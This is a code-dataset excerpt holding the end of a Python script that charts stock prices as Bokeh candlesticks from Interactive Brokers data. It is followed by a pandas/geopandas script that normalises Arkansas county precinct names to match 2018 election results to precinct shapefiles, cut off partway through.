'''不设置结束时间'''\n # Price_Ag = ib.reqHistoricalData(\n # contract, endDateTime='', durationStr=dur,\n # barSizeSetting=barsize, whatToShow='MIDPOINT', useRTH=False)\n '''设置结束时间'''\n Price_Ag = ib.reqHistoricalData(\n contract, endDateTime=endTime, durationStr=dur,\n barSizeSetting=barsize, whatToShow='MIDPOINT', useRTH=False)\n\n df = util.df(Price_Ag)\n return df\n\nif __name__ == '__main__':\n '''\n durationStr: Time span of all the bars. Examples:\n '60 S', '30 D', '13 W', '6 M', '10 Y'.\n barSizeSetting: Time period of one bar. Must be one of:\n '1 secs', '5 secs', '10 secs' 15 secs', '30 secs',\n '1 min', '2 mins', '3 mins', '5 mins', '10 mins', '15 mins',\n '20 mins', '30 mins',\n '1 hour', '2 hours', '3 hours', '4 hours', '8 hours',\n '1 day', '1 week', '1 month'.\n '''\n dur = '1 D'\n barsize1 = '1 min'\n barsize2 = '10 mins'\n endtime = ''\n # endtime = '20201103 12:00:00'\n # dur2 = '5 D'\n # barsize2 = '10 mins'\n # endtime2 = ''\n # endtime2 = '20200405 00:00:00'\n\n now = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n output_file(\"log_lines_%s.html\"% (str(now)[0:17]))\n\n df=pd.DataFrame(MSFT)[:50]\n df['date']=pd.to_datetime(df['date'])\n inc=df.close>df.open\n dec=df.open>df.close\n open=np.array(df['open'])\n opem=open.tolist()\n w=23*60*3000#一天的时间用毫秒展示\n #工具条\n # 创建数据 → 包含四个标签\n hover = HoverTool(tooltips=[\n (\"index\", \"$index\"),\n (\"open\", \"@opem\"),\n (\"high\", \"@high\"),\n (\"low\", \"@df.low\"),\n (\"close\", \"@df.close\"),\n (\"(x,y)\", \"($x, $y)\"),\n ])\n # 设置标签显示内容\n # $index:自动计算 → 数据index\n # $x:自动计算 → 数据x值\n # $y:自动计算 → 数据y值\n # @A:显示ColumnDataSource中对应字段值\n TOOLS=[hover,'crosshair,pan,wheel_zoom,box_zoom,zoom_in, xzoom_in, yzoom_in,zoom_out, xzoom_out, yzoom_out,reset,save']\n TOOLTIPS=[(),(),]\n #画布\n # opts=dict(plot_width=1000,plot_height=50)\n p=figure(x_axis_type='datetime',tools=TOOLS,plot_width=1000,plot_height=650,title='Price',toolbar_location=\"below\",\n toolbar_sticky=False)\n\n # 工具栏位置:\"above\",\"below\",\"left\",\"right\"\n #其它\n\n p.xaxis.major_label_orientation=pi/4\n p.grid.grid_line_alpha=0.3\n #绘图\n p.segment(df.date,df.high,df.date,df.low,color='black') #箱线图\n p.vbar(df.date[inc],w,df.open[inc],df.close[inc],fill_color='#F2583E',line_color='black')\n p.vbar(df.date[dec], w, df.open[dec], df.close[dec], fill_color='#D5E1DD', line_color='black')\n # p.line(x=df.date,y=df.high,legend='A',line_width=2)\n # 显示结果\n show(p)\n\n","sub_path":"tset2.py","file_name":"tset2.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"449382142","text":"import geopandas as gpd\nimport pandas as pd\n\nshp_path = \"/Users/hopecj/projects/AR/Shapefiles/AR Precincts 10_11_2019/ELECTION_PRECINCTS.shp\"\nelec_path = \"/Users/hopecj/projects/gerryspam/AR/AR_G18.csv\"\n\nelec_df = pd.read_csv(elec_path)\nshp_df = gpd.read_file(shp_path)\nshp_df = shp_df[[\"state_fips\", \"county_fip\",\n \"county_nam\", \"precinct\", \"geometry\"]]\n\n\"\"\"\ngeneral helper functions for all counties\n\"\"\"\n\n\ndef chop_five(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=5)\n\n\n\"\"\"\ncounty-specific cleaning counties\n\"\"\"\n\n\ndef arkansas(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace({\n \"DeWitt 1\": \"Dewitt ward 1\",\n \"Dewitt 2\": \"Dewitt ward 2\",\n \"Dewitt 3\": \"Dewitt WARD 3\",\n \"Stuttgart 1\": \"Stuttgart ward 1\",\n \"Stuttgart 2\": \"Stuttgart ward 2\",\n \"Stuttgart 3\": \"Stuttgart ward 3\",\n })\n\n\ndef ashley(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace({\n \"Crossett Ward 1\": \"CW1\",\n \"Crossett Ward 2\": \"CW2\",\n \"Crossett Ward 3\": \"CW3\",\n \"Cross Roads\": \"CROSSROADS\",\n \"Fountain Hill City\": \"FH CITY\",\n \"Fountain Hill Rural\": \"FH RURAL\",\n \"Hamburg Ward 1\": \"HW1\",\n \"Hamburg Ward 2\": \"HW2\",\n \"Hamburg Ward 3\": \"HW3\",\n \"Mt. Zion\": \"MT ZION\",\n \"North Crossett East\": \"NCE\",\n \"North Crossett West\": \"NCW\",\n \"Snyder / Trafalgar\": \"SNY/TRA\",\n \"VO - Tech\": \"VOTECH\",\n \"West Crossett Rural\": \"WCR\",\n })\n\ndef baxter(dat):\n dat[\"prec\"] = dat[\"prec\"] + \"b\"\n\n\ndef benton(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Precinct 01\": \"Precinct 1\",\n \"Precinct 02\": \"Precinct 2\",\n \"Precinct 03\": \"Precinct 3\",\n \"Precinct 04\": \"Precinct 4\",\n \"Precinct 05\": \"Precinct 5\",\n \"Precinct 06\": \"Precinct 6\",\n \"Precinct 07\": \"Precinct 7\",\n \"Precinct 08\": \"Precinct 8\",\n \"Precinct 09\": \"Precinct 9\",\n })\n\ndef boone(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Diamond City (12)\": \"District 12\",\n })\n\ndef bradley(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Warren Ward 1\": \"Ward 1\",\n \"Warren Ward 2\": \"Ward 2\",\n \"Warren Ward 3\": \"Ward 3\"})\n\n\ndef carroll(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Berryville Ward 1\": \"BV Ward 1\",\n \"Berryville Ward 2\": \"BV Ward 2\",\n \"Eureka Springs Ward 1\": \"ES Ward 1\",\n \"Eureka Springs Ward 2\": \"ES Ward 2\",\n \"Eureka Springs Ward 3\": \"ES Ward 3\",\n \"Green Forest Ward 1\": \"GF Ward 1\",\n \"Green Forest Ward 2\": \"GF Ward 2\",\n \"North East Hickory\": \"NE Hickory\",\n \"Northwest Hickory\": \"NW Hickory\",\n \"Long Creek\": \"Lng Crk\",\n \"SW & SE Hickory\": \"SW/SE HICKORY\",\n })\n\n\ndef chicot(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\" Carlton\": \"Carlton 1 & 2\",\n \" Carlton 2\": \"Carlton 1 & 2\",\n })\n\ndef clark(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Central 1\": \"Central\",\n \"Curtis 1\": \"Curtis\",\n \"East County 1\": \"East County\",\n \"Gum Springs Outside 1\": \"Gum Springs Outside\",\n \"Gum Springs 1\": \"Gum Springs Inside\",\n \"Gurdon Gen 1\": \"Gurdon General\",\n \"Hollywood 1\": \"Hollywood\",\n \"North East County\": \"Northeast County\",\n \"Okolona City 1\": \"Okolona City\",\n \"South County 1\": \"South County\",\n \"West County 1\": \"West County\",\n \"Whelen Springs 1\": \"Whelen Springs\",\n })\n\n\ndef clay(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Bennett & Lemmons\": \"Bennett and Lemmons\",\n \"E Oak Bluff & Blue Cane\": \"East Oak Bluff & Blue Cane\",\n \"Liddell & chalk Bluff\": \"Liddell & Chalk Bluff\",\n \"Cleveland & N Kilgore\": \"N Kilgore & Cleveland\",\n \"North St Francis\": \"North St. Francis\",\n \"Gleghorn & S Kilgore\": \"S Kilgore & Gleghorn\",\n \"South St Francis\": \"South St. Francis\",\n })\n \ndef cleveland(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\" Kingsland Out\": \"Kingsland outside\", })\n\n\n\n\ndef columbia(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Taylor City\": \"Taylor\", \"Waldo City\": \"Waldo\"})\n\n\ndef conway(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=6)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"St Vincent\": \"St. Vincent\", \n \"Lick Mountain\": \"Lick Mtn.\",\n \"Morrilton Ward 1\": \"Ward 1\",\n \"Morrilton Ward 2\": \"Ward 2\",\n \"Morrilton Ward 3\": \"Ward 3\",\n \"Morrilton Ward 4\": \"Ward 4\",\n \"nifee City\": \"menifee city\",\n })\n\n\ndef crawford(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Alma 01\": \"Alma 1\",\n \"Alma 02\": \"Alma 2\",\n \"Alma 03\": \"Alma 3\",\n \"Alma 04\": \"Alma 4\",\n \"Cove City\": \"Cove City CSD\",\n \"Lee Creek\": \"Lee Creek CSD\",\n \"Mulberry 01\": \"Mulberry 1\",\n \"Mulberry 02\": \"Mulberry 2\",\n \"Mulberry 03\": \"Mulberry 3\"})\n\n\ndef cross(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Bay Village / Birdeye\": \"Bay Village, Birdeye\",\n \"Cherry Valley\": \"Cherry Valley City\",\n \"Tyronza / Twist\": \"Tyronza, Twist\",\n \"Wynne Ward 1\": \"WYNNE WARD 1\",\n \"Wynne Ward 2\": \"WYNNE WARD 2\",\n \"Wynne Ward 3\": \"WYNNE WARD 3\",\n \"Wynne Ward 4\": \"WYNNE WARD 4\",\n \"Wynne Ward 5\": \"WYNNE WARD 5\"})\n\ndef dallas(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\" District 5 -\": \"district 5\", \n })\n\ndef desha(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Bowie W1\": \"Bowie 1\",\n \"Bowie W2\": \"Bowie 2\",\n \"Bowie W3\": \"Bowie 3\",\n \"Mitcheville\": \"Mitchellville\",\n \"Rand W1\": \"Randolph 1\",\n \"Rand W2\": \"Randolph 2\",\n \"Rand W3\": \"Randolph 3\",\n \"Rand W4\": \"Randolph 4\",\n \"Rand Rural\": \"Randolph Rural\",\n \"Silver Lake\": \"Silverlake\",\n })\n\n\ndef drew(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Mar N Box 1\": \"MN BOX 1 - RH Cumb. Presb\",\n \"Mar N Box 2\": \"MN Box 2 - RH Baptist Chu\",\n \"Marion South\": \"Marion South - Shady Grov\",\n })\n\n\ndef faulkner(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Wilson 35\": \"35 Wilson\",\n \"West Cadron 14\": \"14 W Cadron\",\n \"Walker 38\": \"38 Walker\",\n \"Vilonia City 21\": \"21 Vilonia\",\n \"Union 37\": \" 37 Union\",\n \"Pine Mt 36\": \"36 Pine Mt.\",\n \"Palarm 39\": \" 39 Palarm\",\n \"Newton 34\": \"34 Newton\",\n \"Mountain 32\": \"32 Mountain\",\n \"Mount Vernon 33\": \"33 Mt. Vernon\",\n \"Matthews 31\": \"31 Matthews\",\n \"Harve 30\": \"30 Harve\",\n \"Hardin Rural 28\": \"28 Hardin\",\n \"Hardin City West (GB) 55\": \"55.01 Hardin GB West\",\n \"Hardin City East (GB) 29\": \"29.01 Hardin GB East\",\n \"Enola 27\": \"27 Enola\",\n \"East Fork 26\": \"26 East Fork\",\n \"Eagle 25\": \"25 Eagle\",\n \"E Cadron C 48\": \"48 E Cadron C\",\n \"E Cadron B 13\": \"13 E Cadron B\",\n \"E Cadron A 12\": \"12 E Cadron A\",\n \"Danley Rural 23\": \"23 Danley\",\n \"Danley City (Mayflower) 24\": \"24 Mayflower\",\n \"Cypress Rural 22\": \"22 Cypress\",\n \"Clifton 19\": \"19 Clifton\",\n \"California 18\": \"18 CA\",\n \"Bristol 17\": \"17 Bristol\",\n \"Benton 16\": \"16 Benton\",\n \"Benedict 15\": \"15 Benedict\",\n \"4f Conway City 05\": \"05 4F\",\n \"4e Conway City 03\": \"03.01 4E\",\n \"4d Conway City 04\": \"04.01 4D\",\n \"4c Conway City 11\": \"11 4C\",\n \"4b Conway City 02\": \"02 4B\",\n \"4a Conway City 01\": \"01.01 4A\",\n \"3g Conway City 54\": \"54 3G\",\n \"3f Conway City 53\": \"53 3F\",\n \"3e Conway City 45\": \"45.01 3E\",\n \"3d Conway City 50\": \"50.01 3D\",\n \"3c-West Conway City 46\": \"46 3C-W\",\n \"3c-East Conway City 09\": \"09 3C-E\",\n \"3b Conway City 08\": \"08 3B\",\n \"3a Conway City 10\": \"10 3A\",\n \"2c Conway City 49\": \"49 2C\",\n \"2b Conway City 06\": \"06.01 2B\",\n \"2a Conway City 07\": \"07 2A\",\n \"1e-West Conway City 44\": \"44 1E-W\",\n \"1e-East Conway City 43\": \"43 1E-E\",\n \"1c-South Conway City 42\": \"42 1C-S\",\n \"1c-North Conway City 41\": \"41 1C-N\",\n })\n\n\ndef franklin(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"7-C (Etna)\": \"7-C Etna\",\n \"6-B (Altus City)\": \"6-B Altus City\",\n \"7-A (Cecil)\": \"7-A Cecil\",\n \"3-E (Watalula)\": \"3-E Watalula\",\n \"2-D (Wallace/Ivy)\": \"2-D Wallace/Ivy\",\n \"1-B (Oz Wd 3)\": \"1-B Ozark Wd. 3\",\n \"2-A (Oz Wd 2)\": \"2-A Ozark Wd. 2\",\n \"3-F (Mountain)\": \"3-F Mountain\",\n \"5-A (Wallace/Ivy)\": \"5-A Wallace/Ivy\",\n \"9-A (Charleston Wd 2)\": \"9-A Charleston Wd. 2\",\n \"3-A (Lonelm/Cravens)\": \"3-A Lone Elm/Cravens\",\n \"8-A (Branch City)\": \"8-A Branch City\",\n \"4-B (Watalula)\": \"4-B Watalula\",\n \"3-D (Jethro)\": \"3-D Jethro\",\n \"3-B (Fern)\": \"3-B Fern\",\n \"7-D (Donald Rural)\": \"7-D Donald\",\n \"3-C (Boston)\": \"3-C Boston\",\n \"8-B (Charleston Wd 1)\": \"8-B Charleston Wd. 1\",\n \"8-D (Vesta)\": \"8-D Vesta\",\n \"6-D (Weiderkehr Village)\": \"6-D W.V. City\",\n \"8-F (Cecil)\": \"8-F Cecil\",\n \"5-C (Webb City)\": \"5-C Webb City\",\n \"2-C (Lonelm/Cravens)\": \"2-C Lone Elm/Cravens\",\n \"4-C (WV Rural)\": \"4-C W-V Rural\",\n \"6-A (Altus Rural)\": \"6-A Altus Rural\",\n \"6-C (Denning)\": \"6-C Denning City\",\n \"4-D (Oz Rural)\": \"4-D Ozark Rural\",\n \"4-A (Philpot)\": \"4-A Philpot\",\n \"8-E (Donald Rural)\": \"8-E Donald\",\n \"9-C (Charleston Rural)\": \"9-C Charleston Rural\",\n \"7-B (Webb City)\": \"7-B Webb City\",\n \"8-G (Donald Rural)\": \"8-G Donald\",\n \"1-A (Oz Wd 1)\": \"1-A Ozark Wd.1\",\n \"5-B (Oz Rural)\": \"5-B Ozark Rural\",\n \"2-B (Oz Rural)\": \"2-B Ozark Rural\",\n \"9-B (Charleston Wd 3)\": \"9-B Charleston Wd. 3\",\n \"2-E (Oz Wd 3)\": \"2-E Ozark Wd. 3\",\n \"1-C (Oz WD 2)\": \"1-C Ozark Wd.2\",\n \"8-C (Charleston Rural)\": \"8-C Charleston Rural\",\n })\n\n\ndef fulton(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"MS - Afton\": \"MAMMOTH SPRING/AFTON\",\n \"Fulton - Mt. Calm\": \"FULTON/MT CALM\"\n })\n dat[\"prec\"] = dat[\"prec\"].str.replace(\" - \", \"/\")\n\ndef garland(dat): \n dat[\"prec\"] = dat[\"prec\"].str.lstrip(\"0\")\n\n\ndef greene(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Delaplaine - Jones\": \"Delaplaine-Jones\",\n \"Lafe - Breckenridge\": \"Lafe-Breckenridge\",\n \"Marmaduke - Hurricane\": \"Marmaduke-Hurricane\",\n \"Oak Grove - Union\": \"Oak Grove-Union\",\n })\n\n\ndef hempstead(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=3)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Cross Roads\": \"Crossroads\",\n })\n\ndef hotspring(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Friendship City\": \"Friendship\",\n \"Malvern W-1\": \"ward 1\",\n \"Malvern W-2\": \"ward 2\",\n \"Malvern W-3\": \"ward 3\",\n \"Malvern W-4\": \"ward 4\",\n }\n )\n\ndef howard(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"ineral Spring 3\": \"Mineral spring 3\",\n }\n )\n\ndef independence(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Big Bottom / Wycough / Logan\": \"Big Bottom Wycough Logan\",\n \"Black River / Marshall\": \"Black River/Marshall\",\n \"Cushman / Union\": \"Cushman/Union\",\n \"Greenbrier - Desha\": \"Greenbrier-Desha\",\n \"Greenbrier - Jamestown\": \"Greenbrier-Jamestown\",\n \"Greenbrier - Locust Grove\": \"Greenbrier-Locust Grove\",\n })\n\n\ndef izard(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Calico Rock Ward 1\": \"CALICO ROCK - WARD 1\",\n \"Calico Rock Ward 2\": \"CALICO ROCK - WARD 2\",\n \"Calico Rock Ward 3\": \"CALICO ROCK - WARD 3\",\n \"Calico Rock Ward 4\": \"CALICO ROCK - WARD 4\",\n \"Horseshoe Bend Ward 1\": \"HORSESHOE BEND - WARD 1\",\n \"Horseshoe Bend Ward 2\": \"HORSESHOE BEND - WARD 2\",\n \"Horseshoe Bend Ward 3\": \"HORSESHOE BEND - WARD 3\",\n \"Horseshoe Bend Ward 4\": \"HORSESHOE BEND - WARD 4\",\n \"Melbourne Ward 1\": \"MELBOURNE - WARD 1\",\n \"Melbourne Ward 2\": \"MELBOURNE - WARD 2\",\n \"Melbourne Ward 3\": \"MELBOURNE - WARD 3\",\n \"Melbourne Ward 4\": \"MELBOURNE - WARD 4\",\n \"Mt. Pleasant City\": \"MOUNT PLEASANT CITY\",\n \"Mt. Pleasant Rural\": \"MOUNT PLEASANT RURAL\",\n })\n\n\ndef jackson(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Crossroads -37\": \"CROSSROADS-37\",\n \"Gourdneck - Citizenship\": \"GOURDNECK-CITIZENSHIP\",\n \"Newport Ward 1-A\": \"Newport W 1-A\",\n \"Newport Ward 1-B\": \"Newport W 1-B\",\n \"Newport Ward 2-A\": \"Newport W 2-A\",\n \"Newport Ward 3-C\": \"Newport W 3-A-C\",\n \"Newport Ward 4-A\": \"Newport W 4-A\",\n \"Newport Ward 4-B\": \"Newport W 4-B\",\n \"Newport Ward 2-C\": \"Newport W 2-C\",\n \"Newport Ward 2-B\": \"Newport W 2-B\",\n \"Newport Ward 3-B\": \"Newport W 3-B\",\n \"Penninghton Balch\": \"PENNINGTON BALCH\",\n })\n\ndef lafayette(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=6)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Stamps Ward 1, Prec 1\": \"Stamps Ward 1, Pct 1\",\n \"Stamps Ward 1, Prec 2\": \"Stamps Ward 1, Pct 2\",\n \"Bradley City\": \"Bradley\",\n \"Buckner City\": \"Buckner\",\n \"Lewisville Out\": \"Lewisville Ward 1 (Out)\",\n \"Stamps W1 P2 Out\": \"Stamps Ward 1, Pct 2 (Out)\",\n \"Stamps W2 Out\": \"Stamps Ward 2 (Out)\",\n \"Buckner Out\": \"Buckner (Out)\",\n \"Bradley Out\": \"Bradley (Out)\",\n })\n\n\ndef lawrence(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Boas #1\": \"Boas 1\",\n \"Boas #2\": \"Boas 2\",\n \"Boas #3\": \"Boas 3\",\n \"Campbell #1\": \"Campbell 1\",\n \"Campbell #2\": \"Campbell 2\",\n \"Campbell #3\": \"Campbell 3\",\n \"Campbell #4\": \"Campbell 4\",\n \"Reeds Creek Saffell\": \"Reed's Creek Saffell\",\n \"Reeds Creek Strawberry\": \"REED'S CREEK STRAWBERRY\",\n })\n\n\ndef lee(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Precinct 1\": \"JP01\",\n \"Precinct 2\": \"JP02\",\n \"Precinct 3\": \"JP03\",\n \"Precinct 4\": \"JP04\",\n \"Precinct 5\": \"JP05\",\n \"Precinct 6\": \"JP06\",\n \"Precinct 7\": \"JP07\",\n \"Precinct 8\": \"JP08\",\n \"Precinct 9\": \"JP09\",\n })\n\n\ndef lincoln(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=6)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"E Lincoln Co FD\": \"SE Lincoln Co FD\",\n \"ells Bayou\": \"Wells Bayou/FS\",\n \"Tarry\": \"Bar/Tarry\",\n \"Yorktown\": \"Bar/Yorktown\",\n \"Lone Pine / Garnett\": \"Lone Pine/Garnett\",\n \"Lone Pine / Mt Home\": \"Lone Pine/Mt. Home\",\n \"Owen / Glendale\": \"Owen/Glendale\",\n \"Owen / Palmyra\": \"Owen/Palmyra\",\n \"Wells Bayou\": \"Wells Bayou/FS\",\n \"Grady City W1 & W2\": \"Grady City W1& W2\",\n \"ould City W1\": \"Gould City W1\",\n })\n\n\ndef littleriver(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Arden Township\": \"Arden\",\n \"Arkinda Township\": \"Arkinda\",\n \"Burke Township\": \"Burke\",\n \"Caney Township\": \"Caney\",\n \"Cleveland Township\": \"Cleveland\",\n \"Franklin Township\": \"Franklin\",\n \"Jackson Township\": \"Jackson\",\n \"Jefferson Township\": \"Jefferson\",\n \"Jewell Township\": \"Jewell\",\n \"Johnson Township\": \"Johnson\",\n \"Lick Creek Township\": \"Lick Creek\",\n \"Little River Township\": \"Little River\",\n \"Red River Township\": \"Red River\",\n \"Wallace / Richland\": \"Wallace/Richland\",\n })\n\n\ndef logan(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=6)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Sht Mtn WD 1\": \"Short Mtn Ward 1\",\n \"Sht Mtn WD 2\": \"Short Mtn Ward 2\",\n \"Sht Mtn WD 3\": \"Short Mtn Ward 3\",\n \"Sht Mtn WD 4\": \"Short Mtn Ward 4\",\n \"Blue Mountain City\": \"Blue Mtn City\",\n \"Blue Mountain Rural\": \"Blue Mtn Rural\",\n \"Boone WD 1\": \"Boone Ward 1\",\n \"Boone WD 2\": \"Boone Ward 2\",\n \"Boone WD 3\": \"Boone Ward 3\",\n \"Boone WD 4\": \"Boone Ward 4\",\n })\n\n\ndef lonoke(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"05 - Cabot City Ward 1\": \"05 - Cabot City W/1\",\n \"06 - Cabot City Ward 2\": \"06 - Cabot City W/2\",\n \"07 - Cabot City Ward 3\": \"07 - Cabot City W/3\",\n \"08 - Cabot City Ward 4\": \"08 - Cabot City W/4\",\n \"13 - Carlisle TWP\": \"13 - Carlisle Twp.\",\n \"34 - Lonoke City Ward 1\": \"34 - Lonoke City W/1\",\n \"35 - Lonoke City Ward 2\": \"35 - Lonoke City W/2\",\n \"36 - Lonoke City Ward 3\": \"36 - Lonoke City W/3\",\n \"37 - Lonoke City Ward 4\": \"37 - Lonoke City W/4\",\n \"42 - Prairie TWP\": \"42 - Prairie Twp.\",\n \"45 - Totten TWP\": \"45 - Totten Twp.\",\n \"46 - Walls TWP\": \"46 - Walls Twp.\",\n \"47 - Ward City Ward 1\": \"47 - Ward City W/1\",\n \"48 - Ward City Ward 2\": \"48 - Ward City W/2\",\n \"49 - Ward City Ward 3\": \"49 - Ward City W/3\",\n \"51 - Williams TWP\": \"51 - Williams Twp.\",\n \"53 - Lonoke City Ward 5\": \"53 - Lonoke City W/5\",\n \"54 - Lonoke City Ward 6\": \"54 - Lonoke City W/6\",\n \"55 - Lonoke City Ward 7\": \"55 - Lonoke City W/7\",\n \"55 - Lonoke City Ward 8\": \"55 - Lonoke City W/8\",\n \"01 - Allport City\": \"01- Allport City\",\n \"11 - Carlisle City Ward 2\": \"11 -Carlisle City Ward 2\",\n \"19 - England City Ward 3\": \"19- England City Ward 3\",\n \"56 - Lonoke City Ward 8\": \"56 - Lonoke City W/8\",\n })\n\n\ndef marion(dat):\n dat[\"prec\"] = \"P00\" + dat[\"prec\"].str.slice(start=9)\n\n\ndef miller(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Hickory St\": \"Hickory Street\",\n \"Hickory St South\": \"Hickory Street South\",\n \"Ozan Inghram\": \"Ozan\",\n })\n\n\ndef monroe(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Duncan Township\": \"duncan\",\n \"Holly Grove Township\": \"holly grove\",\n \"Keevil Township\": \"keevil\",\n })\n\ndef montgomery(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"MOUNT IDA - IN\": \"Mount Ida - Inside\",\n \"MOUNT IDA - OUT\": \"Mount Ida - Outside\",\n \"NORMAN - IN\": \"Norman - Inside\",\n \"NORMAN - OUT\": \"Norman - Outside\",\n \"ODEN - IN\": \"Oden - Inside\",\n \"ODEN - OUT\": \"Oden - Outside\",\n })\n\ndef newton(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Mt Sherman\": \"Mt. Sherman\"}\n )\n\n\ndef perry(dat):\n dat[\"prec\"] = dat[\"prec\"].str.lstrip(\"0\")\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"1 - Aplin\": \"1-aplin\",\n \"10 - Perry\": \"10-perry\",\n \"11 - Petit Jean\": \"11-petit jean\",\n \"12 - Rankin\": \"12-rankin\",\n \"13 - Rose Creek\": \"13-rose creek\",\n \"14 - Tyler\": \"14-tyler\",#\n \"15 - Union\": \"15-union\",\n \"16 - Union Valley\": \"16-union valley\",\n \"17 - Wye\": \"17-Wye\",\n \"2 - Casa\": \"2-Casa\",\n \"3 - Cherry Hill\": \"3-Cherry Hill\",\n \"4 - Fourche\": \"4-Fourche\",\n \"5 - Houston\": \"5-Houston\",\n \"6 - Kenney\": \"6-Kenney\",\n \"7 - Lake\": \"7-Lake\",\n \"8 - Maumelle\": \"8-Maumelle\",\n \"9 - New Tennessee\": \"9-New Tennessee\",\n })\n\n\ndef phillips(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Bush\": \"PRECINCT 0001\",\n \"Cleburne I\": \"PRECINCT 0008\",\n \"Cleburne II\": \"PRECINCT 0008\",\n \"Cleveland\": \"PRECINCT 0014\",\n \"Cypress\": \"PRECINCT 0014\",\n \"Elaine I\": \"PRECINCT 0016\",\n \"Elaine II\": \"PRECINCT 0016\",\n \"Helena West Helena 1\": \"PRECINCT 0001\",\n \"Helena West Helena 2\": \"PRECINCT 0003\",\n \"Helena West Helena 3\": \"PRECINCT 0005/0006\",\n \"Hickory Ridge Marvell 1\": \"PRECINCT 0013\",\n \"Hickory Ridge Marvell I\": \"PRECINCT 0013\",\n \"Hickory Ridge Marvell II\": \"PRECINCT 0013\",\n \"Hickory Ridge Marvell III\": \"PRECINCT 0013\",\n \"Hicksville\": \"PRECINCT 0013\",\n \"Honor VII\": \"PRECINCT 0007\",\n \"Hornor\": \"PRECINCT 0007\",\n \"Hornor II\": \"PRECINCT 0007\",\n \"Hornor III\": \"PRECINCT 0007\",\n \"Hornor IV\": \"PRECINCT 0007\",\n \"Hornor V\": \"PRECINCT 0007\",\n \"Hornor VI\": \"PRECINCT 0007\",\n \"L-Anquille\": \"PRECINCT 0001\",\n \"Lake\": \"PRECINCT 0002\",\n \"Lakeview City\": \"PRECINCT 0015\",\n \"Lexa City\": \"PRECINCT 0010\",\n \"Lower Big Creek\": \"PRECINCT 0014\",\n \"Marion\": \"PRECINCT 0011\",\n \"Marion I\": \"PRECINCT 0011\",\n \"Mooney\": \"PRECINCT 0017\",\n \"Searcy I\": \"PRECINCT 0015\",\n \"Searcy II\": \"PRECINCT 0015\",\n \"Searcy III\": \"PRECINCT 0015\",\n \"Spring Creek I\": \"PRECINCT 0009\",\n \"Spring Creek II\": \"PRECINCT 0009\",\n \"Spring Creek III\": \"PRECINCT 0009\",\n \"Spring Creek IV\": \"PRECINCT 0010\",\n \"Spring Creek V\": \"PRECINCT 0009\",\n \"St Francis I\": \"PRECINCT 0001\",\n \"St Francis II\": \"PRECINCT 0001\",\n \"St Francis IV\": \"PRECINCT 0001\",\n \"Tappan I\": \"PRECINCT 0016\",\n \"Tappan II\": \"PRECINCT 0016\",\n \"Upper Big Creek\": \"PRECINCT 0012\",\n })\n\n\ndef polk(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"09 - DALLAS VALLEY/ SHADY\": \"09 - Dallas Valley\",\n \"01- MENA\": \"01 - Precinct 1\",\n \"02- MENA\": \"02 - Precinct 2\",\n \"03- MENA\": \"03 - Precinct 3\",\n })\n chop_five(dat)\n\n\ndef pope(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].str.replace(\"-\", \"\")\n\n\ndef prairie(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Belcher / Tyler\": \"Belcher/Tyler\",\n \"White River Ward 1\": \"White River City 